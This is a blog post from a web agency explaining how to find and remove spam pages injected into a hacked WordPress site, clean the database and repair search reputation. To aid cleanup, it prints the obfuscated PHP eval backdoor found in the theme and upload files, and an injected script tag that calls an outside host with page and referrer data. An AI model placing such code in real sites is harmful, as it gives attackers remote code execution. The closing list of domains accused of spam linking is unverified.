How-To Fix a WordPress Site That Has Been Hacked and Leaving Spam Pages

We have seen several WordPress sites that have been hacked recently, and it’s been ugly for SEO. One particular client with a WordPress installation had 80 pages inserted into their site, and the worst part is we didn’t know because we couldn’t see the pages in the admin!

Now, I don’t know how in the world they hacked the site, nor how the heck they created pages that don’t show up in the admin, but I’m going to go over how to check your own site for this, and how to remove those pages and steps you can take to hopefully keep them gone.

Has My WordPress Site Been Hacked?

Step one is to determine if your site has been hacked. Unfortunately we found it a bit late as we’ve already seen rankings and traffic take a large hit. Check this as soon as you can!

This particular hack was sneaky. Along with being hidden in the admin, none of the pages created were linked to from the good pages. The way we noticed our site was hacked (after digging for why the site was losing traffic) was to do a Google “site:domain.com” search. We did that for our client, and noticed several spam pages in the SERP.

What do you mean “spam pages”, Paul?

I mean the same type of pages as you see in your email spam folder. I don’t know if I should include the terms in this blog, but there were casino pages, prescription drug pages, dating site pages…stuff like that. There were a lot of them!

Find Hidden Pages on Your Site Using Google

One of the easiest ways to find hidden pages on your site it to go to Google and do a “site:” search for your domain. It’s as easy as scrolling through the URLs listed looking for pages that do not belong.

To get started, just enter your domain in the search box below and hit “Google Search.” Try it right now!

Google Search

You should see results like this:

Google Site Search – site:webranking.com

Search through them looking for any pages that look unusual or that you were not previously aware of.

Find Hidden Pages Using Google Analytics

You can also check your Google Analytics, or whatever you’re using for analytics on your site, for pages that aren’t supposed to be there.

In Google Analytics check in Behavior > Site Content > All Pages.

Just go through the URLs listed looking for pages that look out of place. I’d suggest sorting the list by least visited/viewed pages first as these are likely to receive less traffic than your normal pages.

If you find any pages that you don’t know about, or that look suspicious, you may have been hacked.

Yep, We’re Hacked. Help Us Fix It, Please

At this point you know you’re infected. How do you go about fixing it? There’s a couple things to look for to clean this up.

Fix Part 1: Check Your WordPress Templates and Directories

There were several pages in our site affected (infected) with a PHP script similar to the one below

<?php $qV=”stop_”;$s20=<a href=”https://www.php.net/strtoupper” target=”_blank”>strtoupper (link is external)</a>($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(<a href=”https://www.php.net/isset” target=”_blank”>isset (link is external)</a>(${$s20}[‘q6ae4d5’])){<a href=”https://www.php.net/eval” target=”_blank”>eval (link is external)</a>(${$s20}[‘q6ae4d5’]);}?>

This script was in several files from the header.php page to random pages in the uploads directory. Yours may differ, but it’ll likely be something similar.

If you have FTP access to your site you can do a sitewide search for this. I use Dreamweaver, so I just searched all the files in the site for “$qV”, cause I figured that variable is likely not used in WordPress. I was right.

Another way you could find infected files is ask your hosting provider to run a scan on your site. We did that and they included a nice report listing them all. The screenshot below is what they sent us in an email.

This matched what my search showed. Good! That list will allow you to find the exact script that was used on your site (in case it differs from the script I found).

Now start deleting! Be careful not to delete files that you know you need like header.php. In those just remove that PHP line from the source code. For the random PHP pages showing up in like an uploads directory, just delete those.

Example: /wp-content/uploads/2010/01/gallery.php – it’s sneaky cause you’d see “gallery.php” and think, it’s a photo upload directory, maybe that’s a gallery page or something. It’s not, delete it.

(*NOTE* Make a backup of any file you’re deleting, so if you accidentally delete one that was needed, you’ll be able to put it back *END NOTE*)

Fix Part 2: Check Your Database

Now, since this thing creates multiple pages that cannot be found in the WordPress admin, you’re going to need access to your database. I am a PHPMyAdmin guy, so I like to be able to access the DB with that.

There are 2 ways to do that, either through your hosting site control panel, or download PHPMyAdmin and upload it to your site via FTP. I won’t go into detail about how to use PHPMyAdmin as there are plenty of tutorials on that online.

There are other ways to access your database as well. If you don’t know what you’re doing in the database, get a developer to help (if you don’t have one then contact WebRanking and we can help.).

Let’s just go over what to do once you’re in.

Inside PHPMyAdmin look on the left for your WordPress database, click it.

First things first, back up your database. If you delete something you weren’t supposed to, you’re gonna hate life if you don’t have a backup.

After you get your backup, we want to look for all the pages that are published, so we can find those pesky pages that shouldn’t be there. Click on “Edit” and type this query:

SELECT * FROM `wp_posts` WHERE post_status = “Publish” AND post_type = “Page”

(wp_posts may be different, depending on how your WordPress was installed in the DB)

That should give you a listing of pages in your site. Look through and see if there are any pages that shouldn’t be there. It should be pretty obvious which aren’t good.

You can now go through one by one and delete the pages that aren’t supposed to be there. Or you can look at them and see if there’s something similar in them that can be used to find them all and delete them all in one shot.

One thing I noticed on our client’s site is that every spam page had this code at the end of the post_content field:

script src="//googleminiapi.com/assets.js?r=" + document.referrer + "&p=" + location.href + "

I think that was working with the PHP script to do something. I don’t know what, and I don’t care. I want it gone. To find all those pages, I ran this query:

SELECT * FROM `wp_posts` WHERE post_content LIKE “%googleminiapi%”

In my case, that revealed 80 pages, and all 80 were just the spam pages I saw in the Google results, and in Google Analytics. YAY! Now let’s destroy those dumb pages.

(*NOTE* Do not do this unless you confirm all the pages returned in that query are indeed bad. Neither myself nor WebRanking will be held accountable if you delete pages you shouldn’t if you do this before double checking! Hopefully you have that backup in case something does go wrong. *END NOTE*)

I ran the following to delete the pages.

DELETE FROM `wp_posts` WHERE post_content LIKE “%googleminiapi%”

Shazam, they’re all gone!

Now do another quick check of your database for pages that shouldn’t be there. For me, this was all it took to remove the offending pages.

Site is Clean, Now What?

I wish it was as easy as removing the PHP exploited code, and posts that have the script and spam links…but it’s not.

Now that you’ve removed all the crap, you need to work on protecting your site, and working on your reputation with Google.

Protect Your Site

This is pretty easy to do. It would appear that the site was hacked because of a bug or exploit found in an older version of WordPress. That’s what I’m guessing anyway. Hey, I never finished my Internet Security degree, so I just don’t know.

Protect Your Site Step 1: Update

Update all your plugins, and most importantly, update your WordPress installation. The crew working on WordPress is awesome at finding bugs and fixing them with new versions that have new bugs. But at least they try and patch the holes they missed. So update your site! That’s the best and easiest thing you can do to keep your site secure from exploits.

WordPress Updates Section

Protect Your Site Step 2: Passwords

Your password “12345678” just isn’t going to cut it anymore. I personally recommend no fewer than 10 characters. And yes, you should use capital letters, lower case letters, and at the very least a number. Throw in a special character if you can to help even more.

You can use a site like How Secure Is My Password to see how strong your password is.

Do this for all accounts in your WordPress site. If the hack did come from someone guessing your password, it’s just going to happen again soon.

Go into the Users Section of the site and update the password for each user. Here is where you find them:

WordPress Users Password Section

Fix Your Google Reputation

Everything is fixed on the site, we’ve updated WordPress and plugins, and we’ve changed our passwords. Now let’s get in good with Google.

In the content of those spam pages there were several external links leading to other sites that have similar spam pages. Google saw a bunch of sites with spam links leading back and forth to each other. This is BAD in the eyes of the almighty Google. It’s basically creating a mini spam directory.

If there’s 2 things Google hates more than anything, it’s spam and directories!

Disavow Bad Links

CognitiveSEO – Here’s our link audit tool of choice at WebRanking. It’s what we use, along with Google Search Console (aka Google Webmaster Tools). Run whatever link audit tools you have and find any / all bad links that you have linking to your site. This isn’t just for if your website is hacked, it’s always a great idea to review the links to your site.

Once you have a list of sites that you don’t want linking to you, reach out to them and ask that they remove the link to your site. If they won’t or you cannot contact the webmaster, you will have to create a disavow file to send to Google. Review that link for how to do that. Google has some great info on it.

Here’s a disavow file template for you to use if you’d like.

Now that you have your file, you must submit it. It’s tough to find the link to submit the disavow file, so let me help: Disavow Links.

According to Google “It may take some time for Google to process the information you’ve uploaded. In particular, this information will be incorporated into our index as we recrawl the web and reprocess the pages that we see, which can take a number of weeks. These links will continue to be shown in the Search Console inbound links section.”

Be patient and hopefully all will be restored to normal.

Remove URLs with Google Search Console

One more thing you’ll want to do is remove the URLs that were created from Google’s index. This process is simple but at the same time tedious.

You need to log in to Google Search Console, then open the site you are working with. Once in, go to Google Index > Remove URLs and select “Create a new removal request.” Enter the bad URL, and hit continue.

Remove Spam URLs with Google Search Console

Now it’ll ask you the reason for removing it, which seems more like it’s asking what you want to remove it from, but whatever. For the most part you’re gonna wanna stay with the default “Remove page from search results and cache.” I’ll leave that up to you to figure out tho.

Remove Spam URLs with Google Search Console Step 2

If you have a huge list of URLs and you’re good with Excel, you can use a Concatenate and Hyperlink formula to create a sheet that makes it easy to remove them. It’s still one by one, but it speeds things up. Try this:

=HYPERLINK(CONCATENATE(“https://www.google.com/webmasters/tools/removals-request?hl=en&siteUrl=YOURSITEURL&urlt=”,A1))

With that formula, change YOURSITEURL to whatever your site URL is, and A1 is the first cell of the list of bad URLs. This should return something like the following:

https://www.google.com/webmasters/tools/removals-request?hl=en&siteUrl=https://www.example.com/&urlt=https://www.example.com/spammyurl

Hope that formula makes sense. Let me know in the comments if you need help with that.

This will create a list of URLs you can click on to easily get to the 2nd step in the “Remove URLs” process.

Remove URLs with Bing Webmaster Tools

There is a similar process to block URLs from Bing Webmaster Tools. There’s no shortcut with Excel for this one. Sorry!

Remove Spammy Urls With Bing Webmaster Tools

Get Started Fixing This!

This is probably a bigger issue than you might initially realize. I suggest taking this post and passing it along to your web developer, search engine optimization company, marketing agency, or whomever you have that can help you assess and solve this problem. You should start today.

If you’re a small business, or even if you’re not, and you don’t know how to do any or all of the above, give us a call at 877-550-4487 or contact us. We’ve helped our current client and can help you as well.

Full List of Sites We Disavowed

One final piece I wanted to include is the full list of sites we had to disavow to protect our client. In our research, we found the following domains had similar spam links on them leading to our clients site. We have sent a disavow list with the following domains to Google. If you find your domain on this list, and have cleaned up the issue contact us to discuss your options for getting it removed from this list and the disavow file we sent to Google.

• 1111vibes.com
• aa-renoconstruction.com
• absolutepestco.com
• adharshilabutterfly.com
• adogstalecollectibles.com
• affordable-optics.com
• airportmoney.com
• alekseysax.com
• alicorngroup.com
• apptitle.com
• apuestaseninternet.net
• armbrustgym.com
• avilaproperty.org
• azhungerwalk.com
• banksiatigers.com.au
• barndoorinteractive.com
• baubixinh.vn
• biscuitlion.pl
• blackoxusa.com
• blog.driversselect.com
• blog.stfeder.de
• bobrdobr.ru
• brandyoucreative.com
• buckeyebrassandwinds.com
• buyitus.com
• c20g.com
• campuspressonline.com
• carlenebenelli.com
• carmenmauerer.de
• cashfount.com
• chesapeakegop.org
• chklocal.com
• chronofhorse.com
• churchrealestate.biz
• citycentermaccah.com
• clarkemallory.com
• cmgintl.com
• colorshealthcare.com
• controlniche.com
• creteland.ca
• cubbekep.net
• davidbriscoemusician.com
• davidslabon.com
• detscene.com
• dienmayhangphu.com
• djpasquale.com
• dmcdenver.com
• elicohenagency.com
• eluniversallatinworld.com
• emconme.com
• enasys-usa.com
• entrenadorpersonal-andy.com
• equipeimports.com
• ericrebmanngolf.com
• estimatemyhomesvaluenow.com
• faridabaddurgabari.com
• fentonward.com
• fhcindia.com
• fireeducator.com
• georgefourseasonssalon.com
• gflean.pl
• glutenfreeexplorer.com
• growthsmart.com
• gtastarmoving.com
• happycatyogaretreats.com
• harryjarrett.net
• hdurivage.com
• hentero.com
• hpcnac.org
• idoortechnologies.com
• illuminati-afterparty.com
• imonetaryadvisory.org

• itcrj.com
• itnow.net
• izadetemadi.com
• jabyr.com
• jamesfraser.co
• jesus-on.com
• johnbirchphotography.com
• johncristy.com
• johnhublerjr.com
• js.keitabo.com
• jzsdefense.com
• keepinitreelcharters.com
• kojata.vn
• larryfritzlan.com
• laurahazzouri.com
• mairie-moux.fr
• marketing-services-malta.com
• massageozzo.com
• mattpatterson.me
• metzgeroutdoors.com
• mikishoten.com
• ministry-cfo.com
• myetts.com
• myhq.com
• myopfreebie.com
• nakuruhospice.org
• newco.ro
• norskcasinobonuser.com
• nymediadesign.com
• opnia.com
• packardbusinessconsulting.com
• pethelp.eu
• primalangler.com
• pyropeg.com
• ramsham.com
• redfoxdesignsandmarketing.com
• sacriversideliving.com
• scratchempire.tv
• seakerasset.com
• senseofbalancenh.com
• shopsausinh.com
• siliconvalleydrones.com
• smoothpictures.nl
• smrtdog.com
• sosfanzine.com
• sp4goleniow.nazwa.pl
• sparrowhawkpartners.com
• stehn-online.de
• stopea.org
• stoptactical.com
• taj-grocers.com
• talwoodproducts.com
• tanzschule-langhans.de
• tec.lv
• technolog-m.by
• thecaliforniastudy.org
• thegeorgemartock.co.uk
• theguitarlab.com
• thehunterbox.com.au
• thomascreekconcepts.com
• tintomedia.com
• todaysmortgagerates.net
• torreviejaapartments.com
• transauto.co
• treasurecoastmarathon.com
• trustliance.com
• trynka.net
• turbowlaw.com
• woodcreationsfurniture.com
• zachjohnsondesign.com
• zuccaluffa.it

This is the End

This is the part where I stop typing and you stop reading. If you liked it, please share it. If you have any comments, I’d love to read them. You can submit those below.

If you like this post and want to find others related to it, then follow me on Twitter: Follow @PaulKragthorpe